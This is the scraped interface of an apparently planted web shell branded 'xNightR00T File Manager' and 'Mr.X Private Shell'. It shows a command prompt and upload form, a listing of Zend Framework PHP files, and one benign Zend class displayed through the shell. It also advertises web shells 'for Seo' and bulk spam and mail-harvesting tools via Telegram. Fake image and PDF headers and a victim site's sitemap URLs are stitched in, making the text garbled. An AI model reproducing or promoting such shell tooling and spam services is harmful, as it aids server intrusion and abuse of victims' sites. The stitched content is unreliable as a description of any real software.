xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?php

class ZendX_Service_ZendServer_ApplicationServer
{
    /**
     * Server ID
     * 
     * @var integer
     */
    protected $_id = null;
    
    /**
     * Current deployed version
     * 
     * @var string
     */
    protected $_deployedVersion = null;
    
    /**
     * Application Status
     * 
     * @var string
     */
    protected $_status = null;
    
    public function __construct(SimpleXMLElement $xml)
    {
        if ($xml->getName() != 'applicationServer') {
            require_once 'ZendX/Service/ZendServer/Exception.php'; 
            throw new ZendX_Service_ZendServer_Exception("Unexpected base XML element: {$xml->getName()}");
        }
        
        if (strlen((string) $xml->id)) { // <id> may be integer 0, this is valid
            $this->_id = (int) $xml->id;
        } else {
            require_once 'ZendX/Service/ZendServer/Exception.php';
            throw new ZendX_Service_ZendServer_Exception("Missing required applicationServer element: id");
        }
        
        // Set all required string elements
        $elements = array(
            'deployedVersion', 
            'status', 
        );
        
        foreach($elements as $element) { 
            $this->{"_$element"} = (string) $xml->{$element};
            if (! $this->{"_$element"}) { 
                require_once 'ZendX/Service/ZendServer/Exception.php';
                throw new ZendX_Service_ZendServer_Exception("Missing required applicationInfo element: $element");
            }
        }
    }
    
	/**
	 * Get the server ID
	 * 
     * @return integer
     */
    public function getId()
    {
        return $this->_id;
    }

	/**
	 * Get the current deployed version
	 * 
     * @return string
     */
    public function getDeployedVersion()
    {
        return $this->_deployedVersion;
    }

	/**
	 * Get the application's status on this particular server
	 * 
	 * This is one of the status constants defined in ZendX_Service_ZendServer_ApplicationInfo
	 * 
     * @return string
     */
    public function getStatus()
    {
        return $this->_status;
    }

}

Filemanager

Name Type Size Permission Actions
ApplicationInfo.php File 5.19 KB 0644
ApplicationServer.php File 2.06 KB 0644
ApplicationsList.php File 2.51 KB 0644
Exception.php File 1.56 KB 0644
LibraryInfo.php File 4.25 KB 0644
LicenseInfo.php File 2.99 KB 0644
Message.php File 1.1 KB 0644
Response.php File 5.99 KB 0644
ServerInfo.php File 3.68 KB 0644
ServersList.php File 2.02 KB 0644
SystemInfo.php File 2.96 KB 0644
bootstrapResponse.php File 2.35 KB 0644
libraryVersion.php File 2.38 KB 0644
vhostInfo.php File 2.42 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml